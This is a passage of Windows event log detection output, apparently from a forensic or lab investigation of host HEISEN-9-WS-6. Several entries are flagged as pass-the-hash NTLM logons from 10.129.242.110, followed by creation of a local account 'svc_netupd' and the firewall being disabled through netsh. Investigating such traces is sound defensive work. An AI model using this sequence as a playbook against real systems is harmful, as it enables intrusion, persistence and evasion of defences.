│                     │                                     │       │                                │          │           │                 │ LogonGuid: 00000000-0000-0000-   │
│                     │                                     │       │                                │          │           │                 │ 0000-000000000000                │
│                     │                                     │       │                                │          │           │                 │ RestrictedAdminMode: '%%1843'    │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ LogonType: 10                    │
│                     │                                     │       │                                │          │           │                 │ VirtualAccount: '%%1843'         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundUserName: '-'      │
│                     │                                     │       │                                │          │           │                 │ WorkstationName: HEISEN-9-WS-6   │
│                     │                                     │       │                                │          │           │                 │ IpPort: '0'                      │
│                     │                                     │       │                                │          │           │                 │ ImpersonationLevel: '%%1833'     │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ TransmittedServices: '-'         │
│                     │                                     │       │                                │          │           │                 │ ProcessId: '0x608'               │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: Administrator    │
│                     │                                     │       │                                │          │           │                 │ ProcessName: C:\Windows\System   │
│                     │                                     │       │                                │          │           │                 │ 32\svchost.exe                   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:26:35 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3645      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1885ae'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:26:38 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3652      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x188587'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:27:47 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3675      │ Heisen-9-WS-6   │ TargetUserName: UMFD-1           │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-96-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Font Driver    │
│                     │                                     │       │                                │          │           │                 │ Host                             │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x9bdc'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:27:47 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3676      │ Heisen-9-WS-6   │ TargetUserName: DWM-1            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xf339'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:27:47 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3677      │ Heisen-9-WS-6   │ TargetUserName: DWM-1            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-1      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0xf2fe'          │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:33:01 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3709      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x393ad'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:38:45 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 3829      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x299ba4'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:38:50 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 3835      │ Heisen-9-WS-6   │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x4804c'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:38:51 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3841      │ Heisen-9-WS-6   │ TargetUserName: UMFD-2           │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-96-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Font Driver    │
│                     │                                     │       │                                │          │           │                 │ Host                             │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x3c9b2'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:38:51 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3842      │ Heisen-9-WS-6   │ TargetUserName: DWM-2            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x3e93f'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-20 17:38:51 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 3843      │ Heisen-9-WS-6   │ TargetUserName: DWM-2            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 2                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-90-0-2      │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: Window Manag   │
│                     │                                     │       │                                │          │           │                 │ er                               │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x3da14'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 22:44:27 │ ‣ Windows Firewall Settings         │ 1     │ Microsoft-Windows-Windows Fire │ 2002     │ 1534      │ Heisen-9-WS-6   │ ModifyingUser: S-1-5-80-308807   │
│                     │ Have Been Changed                   │       │ wall With Advanced Security    │          │           │                 │ 3201-1464728630-1879813800-110   │
│                     │                                     │       │                                │          │           │                 │ 7566885-823218052                │
│                     │                                     │       │                                │          │           │                 │ SettingValue: '06000000'         │
│                     │                                     │       │                                │          │           │                 │ SettingType: 2                   │
│                     │                                     │       │                                │          │           │                 │ SettingValueSize: 4              │
│                     │                                     │       │                                │          │           │                 │ SettingValueDisplay: Private,P   │
│                     │                                     │       │                                │          │           │                 │ ublic                            │
│                     │                                     │       │                                │          │           │                 │ Origin: 1                        │
│                     │                                     │       │                                │          │           │                 │ ModifyingApplication: ''         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 22:50:57 │ ‣ Pass the Hash Activity            │ 1     │ Microsoft-Windows-Security-Aud │ 4624     │ 4261      │ Heisen-9-WS-6   │ AuthenticationPackageName: NTL   │
│                     │ 2                                   │       │ iting                          │          │           │                 │ M                                │
│                     │                                     │       │                                │          │           │                 │ LogonProcessName: NtLmSsp        │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundDomainName: '-'    │
│                     │                                     │       │                                │          │           │                 │ TargetLinkedLogonId: '0x0'       │
│                     │                                     │       │                                │          │           │                 │ LmPackageName: NTLM V2           │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: '-'             │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ IpAddress: 10.129.242.110        │
│                     │                                     │       │                                │          │           │                 │ KeyLength: 0                     │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x0'            │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x430b3c'        │
│                     │                                     │       │                                │          │           │                 │ ElevatedToken: '%%1842'          │
│                     │                                     │       │                                │          │           │                 │ LogonGuid: 00000000-0000-0000-   │
│                     │                                     │       │                                │          │           │                 │ 0000-000000000000                │
│                     │                                     │       │                                │          │           │                 │ RestrictedAdminMode: '-'         │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: '-'           │
│                     │                                     │       │                                │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ VirtualAccount: '%%1843'         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundUserName: '-'      │
│                     │                                     │       │                                │          │           │                 │ WorkstationName: '-'             │
│                     │                                     │       │                                │          │           │                 │ IpPort: '48952'                  │
│                     │                                     │       │                                │          │           │                 │ ImpersonationLevel: '%%1833'     │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-0-0          │
│                     │                                     │       │                                │          │           │                 │ TransmittedServices: '-'         │
│                     │                                     │       │                                │          │           │                 │ ProcessId: '0x0'                 │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: Werni            │
│                     │                                     │       │                                │          │           │                 │ ProcessName: '-'                 │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 22:52:58 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4307      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x430e91'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 22:54:58 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4337      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x4f4e53'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 22:56:58 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4346      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x5c8676'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 22:58:58 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4349      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x696bfc'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:00:24 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4419      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x430b3c'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:00:24 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4420      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x6d626d'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:00:24 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4421      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x432943'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:00:24 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4422      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x434496'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:00:32 │ ‣ Pass the Hash Activity            │ 1     │ Microsoft-Windows-Security-Aud │ 4624     │ 4424      │ Heisen-9-WS-6   │ AuthenticationPackageName: NTL   │
│                     │ 2                                   │       │ iting                          │          │           │                 │ M                                │
│                     │                                     │       │                                │          │           │                 │ LogonProcessName: NtLmSsp        │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundDomainName: '-'    │
│                     │                                     │       │                                │          │           │                 │ TargetLinkedLogonId: '0x0'       │
│                     │                                     │       │                                │          │           │                 │ LmPackageName: NTLM V2           │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: '-'             │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ IpAddress: 10.129.242.110        │
│                     │                                     │       │                                │          │           │                 │ KeyLength: 0                     │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x0'            │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x795881'        │
│                     │                                     │       │                                │          │           │                 │ ElevatedToken: '%%1842'          │
│                     │                                     │       │                                │          │           │                 │ LogonGuid: 00000000-0000-0000-   │
│                     │                                     │       │                                │          │           │                 │ 0000-000000000000                │
│                     │                                     │       │                                │          │           │                 │ RestrictedAdminMode: '-'         │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: '-'           │
│                     │                                     │       │                                │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ VirtualAccount: '%%1843'         │
│                     │                                     │       │                                │          │           │                 │ TargetOutboundUserName: '-'      │
│                     │                                     │       │                                │          │           │                 │ WorkstationName: '-'             │
│                     │                                     │       │                                │          │           │                 │ IpPort: '56570'                  │
│                     │                                     │       │                                │          │           │                 │ ImpersonationLevel: '%%1833'     │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-0-0          │
│                     │                                     │       │                                │          │           │                 │ TransmittedServices: '-'         │
│                     │                                     │       │                                │          │           │                 │ ProcessId: '0x0'                 │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: Werni            │
│                     │                                     │       │                                │          │           │                 │ ProcessName: '-'                 │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:02:32 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4449      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x7958e6'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:04:33 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4455      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x8cf60a'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:05:09 │ ‣ A Member Was Added to             │ 1     │ Microsoft-Windows-Security-Aud │ 4728     │ 4460      │ Heisen-9-WS-6   │ MemberName: '-'                  │
│                     │ a Security-Enabled Global           │       │ iting                          │          │           │                 │ MemberSid: S-1-5-21-3871582759   │
│                     │ Group                               │       │                                │          │           │                 │ -1638593395-315824688-1003       │
│                     │                                     │       │                                │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: None             │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-513        │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: HEISEN-9-WS-6   │
│                     │                                     │       │                                │          │           │                 │ $                                │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:05:09 │ ‣ Local User Creation               │ 1     │ Microsoft-Windows-Security-Aud │ 4720     │ 4461      │ Heisen-9-WS-6   │ UserWorkstations: '%%1793'       │
│                     │                                     │       │ iting                          │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ OldUacValue: '0x0'               │
│                     │                                     │       │                                │          │           │                 │ NewUacValue: '0x15'              │
│                     │                                     │       │                                │          │           │                 │ UserPrincipalName: '-'           │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: HEISEN-9-WS-   │
│                     │                                     │       │                                │          │           │                 │ 6                                │
│                     │                                     │       │                                │          │           │                 │ LogonHours: '%%1797'             │
│                     │                                     │       │                                │          │           │                 │ ScriptPath: '%%1793'             │
│                     │                                     │       │                                │          │           │                 │ PasswordLastSet: '%%1794'        │
│                     │                                     │       │                                │          │           │                 │ UserParameters: '%%1793'         │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ ProfilePath: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ AllowedToDelegateTo: '-'         │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ HomePath: '%%1793'               │
│                     │                                     │       │                                │          │           │                 │ AccountExpires: '%%1794'         │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ DisplayName: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ HomeDirectory: '%%1793'          │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: svc_netupd       │
│                     │                                     │       │                                │          │           │                 │ UserAccountControl: "\r\n\t\t%   │
│                     │                                     │       │                                │          │           │                 │ %2080\r\n\t\t%%2082\r\n\t\t%%2   │
│                     │                                     │       │                                │          │           │                 │ 084"                             │
│                     │                                     │       │                                │          │           │                 │ SidHistory: '-'                  │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-1003       │
│                     │                                     │       │                                │          │           │                 │ SamAccountName: svc_netupd       │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: HEISEN-9-WS-6   │
│                     │                                     │       │                                │          │           │                 │ $                                │
│                     │                                     │       │                                │          │           │                 │ PrimaryGroupId: '513'            │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:06:08 │ ‣ Windows Firewall Settings         │ 1     │ Microsoft-Windows-Windows Fire │ 2003     │ 1547      │ Heisen-9-WS-6   │ ModifyingUser: S-1-5-21-387158   │
│                     │ Have Been Changed                   │       │ wall With Advanced Security    │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ SettingValueSize: 4              │
│                     │                                     │       │                                │          │           │                 │ ModifyingApplication: C:\Windo   │
│                     │                                     │       │                                │          │           │                 │ ws\System32\netsh.exe            │
│                     │                                     │       │                                │          │           │                 │ SettingValue: '00000000'         │
│                     │                                     │       │                                │          │           │                 │ SettingType: 1                   │
│                     │                                     │       │                                │          │           │                 │ Profiles: 1                      │
│                     │                                     │       │                                │          │           │                 │ Origin: 1                        │
│                     │                                     │       │                                │          │           │                 │ SettingValueString: No           │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:06:08 │ ‣ Windows Firewall Settings         │ 1     │ Microsoft-Windows-Windows Fire │ 2003     │ 1548      │ Heisen-9-WS-6   │ ModifyingUser: S-1-5-21-387158   │
│                     │ Have Been Changed                   │       │ wall With Advanced Security    │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ SettingValueSize: 4              │
│                     │                                     │       │                                │          │           │                 │ ModifyingApplication: C:\Windo   │
│                     │                                     │       │                                │          │           │                 │ ws\System32\netsh.exe            │
│                     │                                     │       │                                │          │           │                 │ SettingValue: '00000000'         │
│                     │                                     │       │                                │          │           │                 │ SettingType: 1                   │
│                     │                                     │       │                                │          │           │                 │ Profiles: 2                      │
│                     │                                     │       │                                │          │           │                 │ Origin: 1                        │
│                     │                                     │       │                                │          │           │                 │ SettingValueString: No           │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:06:08 │ ‣ Windows Firewall Settings         │ 1     │ Microsoft-Windows-Windows Fire │ 2003     │ 1549      │ Heisen-9-WS-6   │ ModifyingUser: S-1-5-21-387158   │
│                     │ Have Been Changed                   │       │ wall With Advanced Security    │          │           │                 │ 2759-1638593395-315824688-1002   │
│                     │                                     │       │                                │          │           │                 │ SettingValueSize: 4              │
│                     │                                     │       │                                │          │           │                 │ ModifyingApplication: C:\Windo   │
│                     │                                     │       │                                │          │           │                 │ ws\System32\netsh.exe            │
│                     │                                     │       │                                │          │           │                 │ SettingValue: '00000000'         │
│                     │                                     │       │                                │          │           │                 │ SettingType: 1                   │
│                     │                                     │       │                                │          │           │                 │ Profiles: 4                      │
│                     │                                     │       │                                │          │           │                 │ Origin: 1                        │
│                     │                                     │       │                                │          │           │                 │ SettingValueString: No           │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-24 23:06:33 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 4480      │ Heisen-9-WS-6   │ TargetUserName: Werni            │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
